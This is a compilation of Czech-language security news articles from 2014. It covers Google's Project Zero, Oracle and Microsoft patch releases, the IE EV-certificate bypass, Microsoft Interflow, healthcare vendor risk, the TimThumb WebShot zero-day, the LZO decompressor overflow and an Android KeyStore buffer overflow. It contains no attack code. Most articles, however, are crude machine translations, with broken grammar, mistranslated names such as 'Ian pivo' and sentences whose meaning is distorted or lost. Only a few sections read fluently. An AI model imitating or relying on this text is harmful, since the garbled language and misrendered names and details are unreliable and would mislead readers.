Google oznámila spuštění projektu Zero, specializovaný interní tým, který se bude soustředit na hledání zero-day zranitelnosti v Google je i software třetích stran tak, aby mohly být oprava než mít škodlivé herci šanci jejich zneužití. "Měli byste být schopni používat web bez obav, že trestný čin nebo státem sponzorovaný herec využívající chyby v softwaru infikovat váš počítač, ukrást tajemství, nebo sledovat vaše komunikace, "poznamenal Chris Evans, bývalý šéf bezpečnostní Chrome týmu společnosti Google a nyní hlavní" výzkumník pastýř "pro Project Zero. Projekt je zaměřen na zlepšení bezpečnosti softwaru, který má velkou uživatelskou základnu. "Budeme používat standardní přístupy, jako je vyhledávání a podávání zpráv o velké množství zranitelností. Dále budeme provádět nový výzkum Skutečnosti snižující závažnost rizika, využití, program, analýza a něco jiného, ​​že naši vědci rozhodnout, je výhodnou investici, "vysvětlil. V rozhovoru pro Wired , Evans odhalil další (aktuální) členy týmu: George Hotz (aka "geohotovu"), slavný iPhone a PlayStation 3 hacker; a tři vědci plodný zabezpečení a chyb lovci, kteří byli přijati interně: Tavis Ormandy, Ben Hawkes, a Ian pivo. Současný cíl je získat minimálně dalších šest. "Zavazujeme se dělat naši práci transparentně," vysvětluje Evans. "Každá chyba se objeví bude uložena v externí databázi. Budeme jen hlašte chyby na prodejce a ne třetích stran Softwaru je. Jakmile zpráva chyba se stane veřejnosti (obvykle jednou oprava je k dispozici), budete moci sledovat prodejce time-to-fix výkon, vidět žádný diskutuje o využitelnosti a zobrazit historické využije a pád stopy. " Prodejci budou mít mezi 60 a 90 dny vydat opravu, než Google jde veřejnost s chybou. Pokud chyba je již využíván v přírodě, bude tato doba odkladu podstatně zkrátit -. By to mohlo být jen sedm dnů Evans říká, že projekt je přirozeným pokračováním bezpečnostních opatření, které Google začal provádět v návaznosti na Edwarda Snowden je odhalení o americkou NSA záchytné informace o uživateli Google, protože se pohybuje mezi datovými centry společnosti. Google už má svůj vlastní interní chyba nájemný programu, a financuje několik mimo ty, stejně jako program, oprava odměnu pro zlepšení kód pro open source programů. Projekt Zero, Evans tvrdí, je "především altruistické," ale to vám pomůže udržet všechny uživatele bezpečné - včetně společnosti Google. A uživatel, který se cítí v bezpečí, je více pravděpodobné, klikněte na reklamy, když poukazuje na to. Také projekt je dobrý způsob, jak na Google, aby nábor a výzkumníci testů, které by mohly později přispět k dalším projektům společnosti. "Věříme, že většina výzkumníků bezpečnostní dělat to, co dělají, protože oni milují to, co dělají. co nabízíme, že si myslíme, že je nové, je místo, kde to, co máte rádi, ale v otevřeném a bez rozptýlení, " řekl Evans, a vyzvala zúčastněné výzkumné pracovníky požádat o místě, na tým.


Oracle Java: 20 nových zranitelností záplatované
17.7.2014 Zranitelnosti

Vítejte na n-tou iteraci "náplast nyní" pro Java na pracovních stanicích. Oracle dnes zveřejnila své čtvrtletní záplat bulletin, a Java SE je opět prominentně. Toto kritické Patch Update (CPU) obsahuje 20 nové bezpečnostní opravy pro Oracle Java SE. Většina chyb zabezpečení vzdáleně zneužít bez ověřování, a CVSS skóre 10 a 9.3 naznačují, že mohou být snadno využity, a vést k plné kompromisů. Což znamená, že programy zaznamenávající stisky kláves, eBanking trojské koně, atd., budou brzy následovat.

Oracle / Java je pravděpodobně tím, že v současné době jedním z nejúspěšnějších charitativních organizací na světě, je i nadále dělat vynikající práci v umožnění významného převodu bohatství na podporu chudých počítačoví zločinci a jejich rodinám. Kromě toho, že zdroje z fondů obvykle nemají ponětí, a nesouhlasil darovat přímo z jejich bankovních účtů ...

Po posledních třech letech opakovaných zející díry v Javě, doufáme, že teď jste našli způsob, jak odstranit Java z vašeho počítače zcela, nebo alespoň již spustit Java plugin v rámci webovém prohlížeči. V opačném případě, je zpět na křečka kola, aby opět re-test všechny aplikace, které stále vyžadují Javu, pro kontrolu nevyhnutelné nekompatibility s touto nejnovější verzi, a pak pro urychlení roll-out. To je určitě náplast, která nechcete přeskočit nebo zpoždění.

Plná Oracle oprava bulletin je k dispozici zde: http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html # AppendixJAVA .

Ostatní opravy Oracle (pro databázi, atd.) vydané v dnešním opravy CPU jsou stále pod analýzu zde na SANS ISC. Budu psát o nich později, pokud oprávněné.


Oracle 07. 2014 CPU (oprava svazek)
17.7.2014 Zranitelnosti

Kromě zranitelnosti v Javě, které jsem na které se vztahuje starší , tam je alespoň jedna chyba zabezpečení, která si zaslouží pozornost. CVE-2013-3751, problém v analyzátoru XML Oracle Database. Čtení popis, měl jsem trochu da © ja-vu, a to i vzhledem k počtu CVE z loňského roku. A kopání do posledních záznamů, zjistil jsem, že ano, toto je skutečně oprava před:




Vypadá to, že Oracle 12 kód byl rozeklaný než 11 g náplast šel, a nikdo ho přenést přes, takže Oracle 12 zůstala vystavena stejnému chyby až teď. To vypovídá o Oracle vývoje životního cyklu softwaru a bezpečnostních procesů ... Vážený Larry Ellison: jak se o psaní "Trustworthy Computing" poznámky pro své zaměstnance, a pak po skrz na to? Jsem si jistý, Bill Gates nebude vadit hodně, pokud jste jednoduše zkopírovat jemu od roku 2002 , a to trochu hledání a nahrazování.

Pro ostatní nedůvěryhodných počítačových funkcí vám přináší tento měsíc CPU opravy svazku, see https://blogs.oracle.com/security/ and http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html


Společnost Microsoft aktualizuje července 2014 atd.

16.7.2014 Zranitelnosti

Při pohledu kolem 23 Critical Internet Explorer vzdálené spuštění kódu zranitelnosti jsou záplaty tento měsíc MS14-037, které vyžadují okamžitou pozornost, nejzajímavější je CVE-2014-2783, Internet Explorer "Extended Validation (EV) Certifikát bezpečnostní funkce Bypass zabezpečení". Zranitelnost sám, ohlásil Eric Lawrence z "Fiddler" sláva, je použitelná v "rohu případ" situaci a může vést k MITM útoky.

Pojďme zúžit složitost problematiky pro dobro všech. Co je "EV" certifikát? No, je to zvláštní osvědčení, které organizace nebo jednotlivec zaplatí více peněz na certifikační autoritou, jako je VeriSign vytvořit a pak použít k "zajištění" své komunikace. Weby používající jim jsou obvykle řešeny ve zvláštním způsobem hlavních webových prohlížečů. Adresa proužek zezelená, speciální obdélník je nastavena kolem adresu, nebo jiné vizuální image ujišťuje uživatele, že spojení je se správným webové stránky a šifrována. Zde je příklad webovém prohlížeči představující zelené bar EV vizualizace, prosím, klikněte na obrázek pro detailní:
 

Související chyba je oprava tento měsíc je ošemetný. Internet Explorer verze 7 přes 11 vše umožňují zástupných subdomén s EV certifikáty, které by nikdy neměly být povoleny. Ani Certifikační autority, ani webové prohlížeče by měla umožnit takové vady, ale jejich dodržování je sporná. V minulosti, CA jako Diginotar, Comodo, Trustwave , TurkTrust , a v současné době na národní informatiky centra v Indii , vše udržované případy významných nedostatcích na úrovni CA.

NIC_CA

Takže, spojený s touto chybou v IE 7,8,9,10 a 11, útočníci (zda nebo ne oni jsou státní sponzorována nebo více tradiční počítačové trestné činnosti organizace) by mohly organizace zřídit místa s zástupných EV koncertů spoof hlavní webové vlastnosti jako u Google, Twitter, Facebook a jinde, a krást data z citlivých komunikací tam. Infrastruktura Model důvěra Certificate Authority nadále vykazuje významné trhliny jako vadné modelu důvěry, a to "rohový případ" prostě umožňuje další situace, jako je to. Možné řešení , jako je konvergence nebyly vážně tlačil. Současně, zdraví Microsoft pro záplatování a podávání zpráv o dvou aktuálních otázkách.

Bohužel, tyto druhy otázek, najít svou cestu do softwarových produktů po celou dobu. Částečně, jsou velmi složité pochopit, o QA týmů a vývojáři jistě třeba zúžit rozsah svých projektů. Nemůžete automatizovat tento druh testu, a to iv případě, že je zjištěno, že není přiřazen závažnosti 5 nebo "trumf", protože to není okamžitě přerušit provoz výrobku. Takže oni mohou sedět neadresné v produktu po dobu čtyř nebo pěti verzích nebo více, i když soukromě znám. Pouze expozice kvůli práci cenného papíru výzkumníka nebo hlavní veřejné události může tlačit na přední části seznamu priorit.

Všechna tato diskuse rohových případech stanoví základ pro další diskusi o "internetu věcí". Vždy, když tam jsou interdisciplinární přístupy (jako těžké matematiky a komunikací, nebo interní počítačová síť a automobily) na řešení, tam je zvýšené riziko nehody, protože praktické a teoretické otázky. Vzhledem k tomu, průmysl pokračuje, a jak začínající generující internetu věcí řešení kód do činění s jejich vlastními koutek případě otázek, a jako přijetí a akvizic kupředu, bude technologie internetu věcí demonstrovat ve větším měřítku, že nejsme učení se z minulých chyb.


Podívejte se na Interflow, platformy pro výměnu informací hrozba Microsoft
9.7.2014 Zranitelnosti
V posledních několika letech, tam byl jeden konstantní volání z téměř všech účastníků v informační bezpečnosti společenství: Výzva k spolupráci. Ale to se snadněji řekne, než udělá - je třeba, aby spolupráce vzájemně prospěšná, a především snadné.

Microsoft nedávno oznámil soukromou náhled Microsoft Interflow, platforma pro výměnu bezpečnostní a informační hrozba pro analytiky a výzkumníky, kteří pracují v počítačové bezpečnosti, a věří, že tento projekt klíšťata obou zmíněných boxů. "Interflow poskytuje zabezpečení a ohrožení informací strojově čitelné formát, který umožňuje integrovat do stávajících nástrojů, "Jerry Bryant, vedoucí senior bezpečnostní stratég, Microsoft Trustworthy Computing, řekl Help Net Security. "Firewall a IDS / IPS zařízení jsou toho dobrým příkladem. Pokud uživatel Interflow má vysoce důvěryhodný zdroj známých škodlivých adres URL, může se rozhodnout, zda se tok krmiva do svého firewallu prostřednictvím konektoru automaticky zablokovat přístup na tyto stránky bez jakéhokoliv zásahu člověka . " Jejich cílem je umožnit a usnadnit další výměnu bezpečnosti a informace o hrozbách v celém průmyslu, a uvolnit cestu pro zabezpečení automatizace end-to-end, které považují za důležité, aby držet krok s vyvíjejícím se hrozeb. "Máme v úmyslu na loď Interflow s několika konektory pro většinu běžných nástrojů již v krabici a bude spolupracovat s našimi partnery, náhled identifikovat další konektory a transformace, "řekl Bryant. "Kromě toho jsme podporovat komunitu sdílet všechny konektory a transformuje vytvářejí s ostatními." "Sdílení dobré hrozbách dělá ekosystém bezpečnější, což prospívá všem," podotkl. "Navrhli jsme Interflow speciálně k tomu, aby více obousměrnou výměnu v průmyslu a důrazně vyzýváme organizace začít tím, že se dělí o své lze sdílet data, hrozeb. Umožňujeme tak prostřednictvím aplikace Excel, jako jsou datové Průvodce importem, který odstraňuje složitost transformace dat do STIX dokument. " Kromě Stix, Interflow také obsahuje další specifikace komunitní řízený, jako je TAXII a CybOX. "Sběr a analýza se liší od události k události. Klíčovým faktorem však je, že jakmile indikátor je identifikován a přivádí do Interflow, ochrana se může stát téměř v reálném čase pro všechny partnery sdílení, "řekl. Účastníci se mohou svobodně rozhodnout, jaké údaje, které chcete sdílet, a oni mohou také nastavit úroveň důvěryhodnosti pro data, které dostávají. (Mimochodem, organizace Incident Response, jako jsou počítačové havarijní připravenosti týmů, jsou více než srdečně zváni k účasti.) "Interflow umožňuje postavit vlastní" seznamy hodinky "odfiltrovat data, která jsou pro ně důležité. Seznam hodinky mohou se skládají z věcí, jako jsou rozsahy IP adres nebo ASN. Jak Interflow je navržen tak, aby konzumovat a zpracovávat velké množství dat, sledovat seznamy jsou klíčem k ukazateli povrchových specifické pro danou organizaci, "vysvětlil Bryant na nás. "Na tom místě, údaje jsou stále ve strojově čitelné STIX formátu, který umožňuje zákazníkům umožnit automatizované využití dat v rámci jejich sítí nebo vrtat do něj grafické uživatelské rozhraní Interflow (GUI). Interflow GUI vypadá podobně jako e-mailové schránky aplikace Outlook, který umožňuje kliknout na nové položky a vidět je v podokně náhledu. Vzhledem k tomu, STIX je velmi složitý a má několik úrovní dat, rozhraní umožňuje vrtat hlouběji a hlouběji do informacím indikátor v závislosti na tom, kolik informace byly poskytnuty zdroje. " "Co dělá Interflow jedinečný? " Zeptal jsem se nakonec. "to jsme navrhli speciálně pro integraci nejen s ostatními výměny znalostí platformy, ale také se systémy pro ochranu sítě prostřednictvím našeho plug-in architekturu a SDK," poznamenal, ale dodal, že existuje celá řada sdílení dat hrozba platformy v trhu a že zákazníci by měli používat podle toho, co platforma nejlépe vyhovuje jejich potřebám. zřejmé, že doufají, že Interflow bude to.


Odemčené zadní vrátka do údajů o zdravotní péči
9.7.2014 Zranitelnosti
Většina zdravotnických dodavatelů chybí minimální zabezpečení, které je osvětlené skutečnost, že více než 58% bodování v "D" stupeň rozsahu pro jejich kulturu bezpečnosti. Nová zpráva CORL Technologies rovněž zdůrazňuje, že zdravotnické organizace se nedaří držet dodavatelé odpovědní pro splnění minimálních přijatelných standardů nebo jinak zmírnění slabých bezpečnostních dodavatele související. "údaje se průměrná nemocnice je přístupný po stovky až tisíce prodejců s propastný bezpečnostní postupy poskytující širokou škálu služeb," řekl Cliff Baker, generální ředitel, Corl Technologies. "Když se ve zdravotnictví a průmyslové organizace nemají dodavatelé odpovědní za minimální úrovní zabezpečení, tito prodejci vytvořit odemčený zadní vrátka k citlivým datům ve zdravotnictví." Tyto nové poznatky jsou důležité pro řešení rostoucí počet bezpečnostních incidentů ve firmách připsat partnery a dodavateli - který se zvýšil z 20% v roce 2010 na 28% v roce 2012 podle PWC ve svém "Vyhlídka na dodavatele řízení rizik" (listopad 2013). V návaznosti na tento problém, PWC "US State kyberkriminalitě Survey" (června 2014) zdůrazňuje, že obchodní partneři létat pod bezpečnostní radaru: pouze "44% organizací má postup pro hodnocení třetí strany před zahájením podnikatelské činnosti" a pouze " 31% obsahují ustanovení o bezpečnosti ve smlouvách s externími dodavateli a dodavateli. " dodavatele Intelligence Report, který odstartuje novou sérii studií, které publikoval výzkumný tým CORL, je založen na analýze souvisejících bezpečnostních postupech pro vzorku více než 150 prodejců poskytující služby vedoucích zdravotnických organizací od června 2013 do června 2014. Vědci CORL analyzovat Lidé, proces a technické postupy těchto organizací. Přední poskytovatelé a zdravotní pojištění použít CORL poskytnout rizikové přehledy výkonnostních metrik a průběžné sledování postupů pro ochranu informací prodejců. čtyři klíčové trendy a podpůrné údaje, které vyplynuly z analýzy patří: Většina zdravotnických dodavatelů chybí minimální bezpečnostní postupy k ochraně dat

Padesát osm procent prodejců vstřeleno v "D" řady třídy a 8% vstřeleno v "F" rozsahu třídy, což znamená, že je nedostatek důvěry na základě prokázaných slabých s jejich kultuře bezpečnosti. Ve skutečnosti pouze 4% prodejců vstřeleno v "A" řady stupně vysoká spolehlivost. 16% vstřeleno v "B" mírné důvěry rozsahu stupně a 14% vstřeleno v "C" neurčitý spolehlivosti rozsahu třídy.
Ještě více překvapující, zdravotnické organizace nedržíte prodejci odpovědnost za splnění i minimálních přijatelných standardů. Pouze 32% prodejců má bezpečnostní certifikace. Typické certifikace zahrnují FedRAMP, HITRUST, ISO 27001, SSAE-16, SOC 2 a 3.
Zdravotnické organizace nejsou vědomi všech dodavatelů, kteří mají přístup ke svým údajům
Údaje o průměrné nemocnice je přístupný stovky až tisíce prodejců poskytujících širokou škálu služeb od obchodních služeb, poradenství, tvrdí, zpracování a vzdělávání, aby elektronického zdravotního záznamu (EHR), zdravotnictví a zdravotnické potřeby technologie a produkty pro sítě a bezpečnostní software.
Zdravotnické organizace mají ohromující množství malých Prodejci zvládat
Přes padesát procent prodejců poskytující služby v průměru organizaci zdravotnictví jsou malé a střední podniky s méně než 1000 zaměstnanci.
Podle společnosti Symantec 2014 Internet Security Threat Report, cílené útoky zaměřené na malé a střední podniky podílely na "30 procent cílených kopí-phishing útoky".
Stávající praxe ve zdravotnických organizací jen málo zmírnění Prodejce Související bezpečnostní nedostatky
Prodejce due diligence zdravotnickými organizacemi, není v souladu s riziky. Většina zdravotnické organizace se zaměřují due diligence na jejich největších výrobců - ještě více než polovina z porušení jsou připisovány na malé a střední podniky.
Ve skutečnosti většina organizací nemají program rizik v místě vůbec a manažeři nejsou náležitě informováni o vystavení nebo úsilí o zmírnění rizika.
"I když HIPAA Omnibus pravidlo určuje, že jednotliví aktéři odpovídají v případě porušení, pokud jde o údaje mé organizace, která je zveřejněna, zdroj nezáleží. Bylo mou povinností se chránit ho, tak říká, že náš zákazník. Nemůžeme již spoléhat na činy druhých, aby nás mimo titulní stranu, "řekl Mark Williams, CISSP, CISA, CRISC, CIPP / IT, GIAC a prezident kapitoly ISSA v Chattanooga. "porušení a předpisy třetích stran jsou drastické zvýšení ve zdravotnictví, ale účinné řízení bezpečnostních rizik třetí stranou je drahé, časově náročné a finančně náročné. CORL je v jedinečné pozici, aby měli přístup k zabezpečení dat v ekosystému dodavatele zdravotnictví. Doufáme, že tyto informace použít k osvětlení mezery a poskytnout doporučení do zdravotnických organizací a prodejců podobně, které vám pomohou zlepšit své procesy řízení rizik - a nakonec, zlepšit jejich celkové bezpečnosti a rizik držení těla, "dodal Baker.


Microsoft Patch Tuesday - červenec

9.7.2014 Zranitelnosti

Přehled 07. 2014 Microsoft záplaty a jejich stav.

# Ovlivněno Kontraindikace - KB Známé Využije Hodnocení Microsoft (**) ISC hodnocení (*)
klienti servery
MS14-037 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
Microsoft Windows, Internet Explorer CVE-2014-1763 CVE-2014-1765 CVE-2014-2785 CVE-2014-2786 CVE-2014-2787 CVE-2014-2788 CVE-2014-2789 CVE-2014-2790 CVE-2014-2791 CVE-2014-2792 CVE-2014-2794 CVE-2014-2795 CVE-2014-2797 CVE-2014-2798 CVE-2014-2800 CVE-2014-2801 CVE-2014-2802 CVE-2014-2803 CVE-2014-2804 CVE-2014-2806 CVE-2014-2807 CVE-2014-2809 CVE-2014-2813 CVE-2014-1763 CVE-2014-1765 CVE-2014-2783 CVE-2014-2785 CVE-2014-2786 CVE-2014-2787 CVE-2014-2788 CVE-2014-2789 CVE-2014-2790 CVE-2014-2791 CVE-2014-2792 CVE-2014-2794 CVE-2014-2795 CVE-2014-2797 CVE-2014-2798 CVE-2014-2800 CVE-2014-2801 CVE-2014-2802 CVE-2014-2803 CVE-2014-2804 CVE-2014-2806 CVE-2014-2807 CVE-2014-2809 CVE-2014-2813

KB 2975687 Ano! Závažnost: Kritická
zneužitelnosti: 1 Kritický Důležitý
MS14-038 Chyba zabezpečení v programu Windows Deník by mohla umožnit vzdálené spuštění kódu
Microsoft Windows CVE-2014-1824

KB 2975689 Ne Závažnost: Kritická
zneužitelnosti: 1 Kritický Kritický
MS14-039 Chyba zabezpečení v On-Screen Keyboard umožňuje zvýšení úrovně oprávnění
Microsoft Windows CVE-2014-2781

KB 2975685 Ne Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS14-040 Chyba zabezpečení v pomocnou funkci ovladače
Microsoft Windows CVE-2014-1767

KB 2975684 Ne Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS14-041 Chyba zabezpečení rozhraní DirectShow může umožnit zvýšení úrovně oprávnění
Microsoft Windows CVE-2014-2780

KB 2975681 Ne Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS14-042 Chyba zabezpečení v aplikaci Microsoft Service Bus může způsobit odmítnutí služby
Microsoft Server Software CVE-2014-2814

KB 2972621 Ano! Závažnost: Střední
zneužitelnosti: 1 Méně naléhavé Méně naléhavé
Budeme aktualizovat problémy na této stránce asi týden nebo tak, jak se vyvíjejí. Vážíme aktualizace zákazníci na bázi USA můžete volat Microsoft pro podporu vztahující se zdarma náplast na čísle 1-866-PCSAFETY


Opravit Internet Explorer, hned poté Flash

9.7.2014 Zranitelnosti
Druhé úterý v měsíci Microsoft vždycky vydává své opravy. Tentokrát jsou kritické záplaty určeny pro Internet Explorer a Windows, aktualizovat je ovšem třeba i produkty dalších firem. Jaké jsou priority pro správce IT?

Ze šesti bulletinů zabezpečení Microsoftu jsou kritické dva, první určen pro MSIE, druhý pro Windows. Wolfgang Kandek, CTO ve společnosti Qualys, doporučuje na americkém Computerworldu jako první nasadit opravu MS-14-037, tj. aktualizaci Internet Exploreru, která opravuje celkem 23 jednotlivých bezpečnostních zranitelností. Útočník může bez nasazení těchto oprav ovládnout počítač často už při návštěvě podvodného webu (tj. útoky drive-by download).

Amol Sarwate rovněž ze společnosti Qualys v této souvislosti dodává, že Internet Explorer možná není chybovější než Firefox nebo Chrome, ale Microsoft vydává příslušné bulletiny zabezpečení a nevolí tiché aktualizace vždy v okamžiku, když je oprava k dispozici, proto se chybám v prohlížeči Microsoftu dostává větší publicity.
Další kritická oprava MS14-038 látá problém v operačních systémech, konkrétně v softwaru Windows Journal - tj. zpracování textu psaného perem na obrazovce. Tento formát se ovšem používá nejen na zařízeních s dotykovými displeji, ale i jinde – pro čtení souborů v příslušném formátu. Podvržený soubor může vzhledem k chybě způsobit vzdálené spuštění kódu. W. Kandek doporučuje, že pokud se v organizaci s tímto formátem nepracuje, stojí za to příslušné soubory plošně zakázat.
Kandek dále pokračuje, že velkou prioritou ve firmách by mělo být tentokrát nasadit opravu pro plug-in Adobe Flash – alespoň pokud se v podniku používají jiné prohlížeče než MSIE 10, MSIE 11 nebo Chrome, které si tento plug-in aktualizují automaticky. Pro jiné prohlížeče má oprava dle Kandeka prioritu č. 2, hned za aktualizací Internet Exploreru (viz výše).Jedna z právě opravených chyb v Adobe Flash totiž umožňuje útočníkovi vytvořit podvodné soubory SWF. Stačí pak pouze navštívit příslušný web a útočník se dostane ke cookies uloženým v prohlížeči, včetně těch, které obsahují autentizační údaje. Na tuto zranitelnost upozornil Michele Spagnuolo ze švýcarské pobočky Googlu, který demonstroval postup zneužití pomocí nástroje s názvem Roseta Flash.
Ross Barrett z firmy Rapid7 pro americkým Computerworld uvedl, že pokusy o zneužití lze v tomto případě očekávat velmi rychle. Provozovatelé hlavním webových služeb se snaží své přihlašovací mechanismy před tímto problémem ochránit bez ohledu na postup Adobe, spoléhat však na to rozhodně nelze.


Zero-Day opravené v TimThumb WordPress Script
29.6.2014 Zranitelnosti
Patch pro zero-day zranitelnost v TimThumb byl propuštěn jeho vývojáře, kteří se nikdo příliš rád, o zveřejnění tohoto týdne na populární bezpečnostní konferenci.

"Bohužel nikdo mi řekl, že o tom předtím využití bylo oznámeno - ve skutečnosti jsem se dozvěděl o chybě přes wptavern.com, takže jsem nebyl schopen podívat se do opravy pro něj," řekl Ben Gillbanks, WordPress vývojář, který napsal TimThumb.

To bylo krátce předtím, než dotyčný kód ve funkci WebShot skutečně aktualizovány a zpřístupněny na webu Google Code .

Gillbanks napsal na svém Binary Moon webové stránky, které se již udržuje TimThumb mimo účastí na řídkém bezpečnostní otázce, jako je tento. Obrázek re-dimenzování software založený na PHP, který trpěl předchozí zero-day v roce 2011, to je všechno, ale zastaralý, protože WordPress podporuje příspěvek miniatury.

"Osobně jsem nepoužil TimThumb v tématu WordPress, protože předtím, než předchozí bezpečnostní TimThumb využívat v roce 2011," řekl.

Podrobnosti o dosud nepublikované zranitelnosti ve funkci WebShot byly zveřejněny tento týden na Full Disclosure mailing listu. Zatímco WebShot není ve výchozím nastavení povolena, WordPress Témata, plug-iny a další komponenty třetích stran by mohla být v ohrožení pro dálkové spuštění kódu útoky.

Web bezpečnostní společnost Securi řekl, že zero-day umožňuje útočníkovi na dálku odstranit a upravovat soubory uložené na serveru.
Web bezpečnostní společnost Securi řekl, že zero-day umožňuje útočníkovi dovolit vzdáleně odstranit a upravovat soubory uložené na serveru, a může tak učinit bez ověření.

"První věcí, první - většina lidí, kteří používají TimThumb nemusíte se bát. Kód je ve výchozím nastavení zakázána, a to iv případě, že je povoleno, musíte mít dvě rozšíření na straně serveru nainstalované, aby bylo možné jej vykonat, "řekl Gillbanks.

Odborníci doporučují zablokování WebShot, pokud je to povoleno jako dočasné zmírnění. Securi že uživatelé mohou zakázat funkci otevřením souboru timthumb v tématu nebo plug-in pro příklad, a set WEBSHOT_ENABLED na hodnotu false.

Weby self-hostované na WordPress můžete použít TimThumb re-velikost obrazových souborů, například. Jpg nebo. Png soubory.

Výzkumník Pichaya Morimoto, kteří zveřejněny nula den, řekl, verze 2.8.13 je zranitelný, stejně jako původní WordThumb 1,07 projekt. WordPrss Gallery Plugin a IGIT Příspěvky Slider Widget byly také identifikovány Morimoto jako možná zranitelná, v další pro všechny motivy od themify [.] Já.

Předchozí TimThumb nula den byla zveřejněna v srpnu 2011; zranitelnost povoleno hackeři spustit PHP kód v adresáři TimThumb mezipaměti. Chyba dal někdo vzdálený přístup pro zápis do adresáře.


20-Year Old Chyba zabezpečení opravené v LZO kompresního algoritmu
29.6.2014 Zranitelnosti, Mobil
20-letý zranitelnost v Lempel-Ziv-Oberhumer (LZO) kompresního algoritmu - používá se u některých telefonů se systémem Android, jádrem Linux a dokonce Mars Rovers - nakonec patch tento týden.

Kód vyplývající z funkce algoritmu v knihovně existuje ve volné přírodě po dvě desetiletí, ale bylo recyklováno znovu a znovu, který dělal to složité opravy.

Zatímco algoritmus byl vylepšen v průběhu let, každá iterace představoval stejnou základní implementace open source, nejprve napsal Markus Oberhumer v roce 1994.

Verze 2.07 algoritmu řeší dlouhodobý problém - jemné integer overflow stav v "bezpečných" dekompresor varianty, které by vedly k přetečení vyrovnávací paměti v případě, že algoritmus zpracovány žádné škodlivé vstupní data.

Laboratorní myš Zabezpečení CEO a zakladatel Don Bailey diskutovány podrobnosti, pokud jde o dlouho očekávané opravy v blogu čtvrtek .

"Tím, že opakované použití kódu, který je známý dobře pracovat, a to zejména ve vysoce optimalizované algoritmy, projekty se mohou stát předmětem zranitelnosti v tom, co je vnímáno jako důvěryhodného kódu," vysvětluje Bailey

Bailey, který pravidelně provádí výzkum v oblasti mobilních technologií, internetu věcí a vestavěných systémů, varoval, že zatímco implementace LZO jsou výrazně odlišné, každý "varianta je zranitelný v přesně stejným způsobem." Bailey žádá konec Uživatelé, kteří dohlížejí na algoritmu pro vyhodnocení každé implementaci pro rizika, i když je to už byla oprava.

Zůstane-li unpatched, chyba může být využita kdykoliv algoritmus zpracovává doslovný příkaz Spustit, kus dat, která nebyla na stlačený.

Bailey dává řadu v bezpečnostních řešení hloubky, že správci mohou sledovat nejprve zjistěte, zda jejich infrastruktura je citlivá na chyby a za druhé, jak to patch.

LZO je přenositelná bezztrátová komprese dat knihovna, která umožňuje překrývání kompresi a dekompresi v místě. Za ta léta, algoritmus našel svou cestu, tak či onak, do hrstky projektů, jako jsou Android, OpenVPN, mplayer2 Libav, jádrem Linux a Juniper Junos, mezi jiným subjektům.

Algoritmus je kokrhání úspěch doposud, může být jeho implementace v NASA Mars Rover Curiosity. Robotický rover právě dokončil svůj první marťanský rok, 687 pozemských dní, na Marsu dříve v tomto týdnu, a stejně jako vozítek před ním, Spirit a Opportunity, má mikro řadiče na desce, které používají LZO.


opravené spuštění kódu Chyba postihuje nejvíce androida uživatelů
29.6.2014 Zranitelnosti
Vážný kódu zabezpečení spouštění v Android 4.3 a dřívější byla oprava v Kitkat, nejnovější verzi operačního systému.

Výzkumníci z IBM tento týden zveřejnit povahu zranitelnosti, který byl soukromě zveřejněny na bezpečnostní tým Android v září a záplatované loni v listopadu.

"Vzhledem k tomu Androidu roztříštěnosti a skutečnost, že to byl kódu zabezpečení spouštění, rozhodli jsme se počkat s zveřejňování informací," řekl Roee Hay, vedoucí skupiny výzkumu v otázkách bezpečnosti na IBM.

Hay tým našel zásobníku na bázi přetečení vyrovnávací paměti v Android je úložiště klíčů službě , který podle webových stránek Android vývojářů je zodpovědný za ukládání a zabezpečení šifrovacích klíčů zařízení je.

IBM uvedla, že si není vědoma žádných využije ve volné přírodě a cílujeme na tuto chybu zabezpečení. Úspěšný využít ohrozilo zařízení úplně, což umožňuje útočníkovi spustit kód svého výběru v rámci procesu úložiště klíčů, řekl IBM.

V důsledku toho by útočník mohl získat přístup k pověření zařízení je zámek, šifrované a dešifrovaných hlavních klíčů, a musí být schopen komunikovat s hardware podporovaný skladování a provádět kryptografické funkce, jako je svévolné podepisování dat, řekl IBM.

Útočník by mohl použít škodlivý aplikace se zaměřují na bezpečnostní problém, ale existuje řada problémů překonat, řekl IBM.

Například, musí být škodlivý aplikace moci obejít ochrany paměti založené na nativní v operačním systému, jako je funkce Zabránění spuštění dat (DEP) a Address Space Layout Randomization (ASLR). DEP je využít zmírňování, který omezuje, kde lze kód spuštěn. Útočníci měli úspěch pomocí Skok orientované programování (ROP) útoky s cílem obejít DEP.

ASLR, mezitím, konkrétně zmírňuje přetečení bufferu útoky, které využívají zranitelná místa, jako je tento v Android. ASLR náhodně datových oblastí dělat to obtížný pro škodlivý kód útočníka hádat, kde otevřený prostor by mohl být k dispozici a spustit.

Stack kanárek je také přítomný v Android, který pomáhá odhalit přetečení bufferu chyby, jako je tento, než škodlivý kód může spustit.

Android také využívá kódování, které by také mohly dát do překážku pro spuštění kódu.

"Nicméně, Android KeyStore je respawned pokaždé, když se ukončí," Hay varuje. "Toto chování umožňuje pravděpodobnostní přístup; Kromě toho, že útočník může dokonce teoreticky zneužít ASLR porazit kódování. "

IBM řekl chybě zabezpečení dochází, protože kontrola překročení mezí je nepřítomen zásobníku vyrovnávací paměti vytvořené úložiště klíčů :: metody getKeyForName.

"Tato funkce má několik volání, které jsou přístupné externími aplikacemi pomocí rozhraní Binder (např." android :: KeyStoreProxy :: get "). Proto je variabilní na "KEYNAME" může být regulovatelné pomocí libovolné velikosti pomocí škodlivého aplikací, "řekl Hay. "" Encode_key "rutina, která se nazývá" encode_key_for_uid "může přetečení 'filename' vyrovnávací paměti, protože kontrola hranice chybí."

Podle Android vývojáře webu, KitKat přijetí se blíží na 14 procent, čímž drtivou většinu uživatelů Android v ohrožení; 29 procent uživatelů se na Jelly Bean 4.1, nejvyšší distribuci verze.

Zatímco Google a bezpečnostní tým v Android obecně výzva při vytváření záplaty a informační zprávy k dispozici, většina uživatelů mobilních Android, například, musí počkat, dokud se buď jejich dopravce nebo telefon výrobce tlačí náplast dolů. Tento obchodní model je vypracován zlobu bezpečnosti a ochrany osobních údajů odborníků , a pozornost US Federal Trade Commission, která přijaly opatření v minulosti proti hardware Závadný HTC , jakož i ze čtyř hlavních dopravců pro jejich nedostatek rychlých aktualizací .


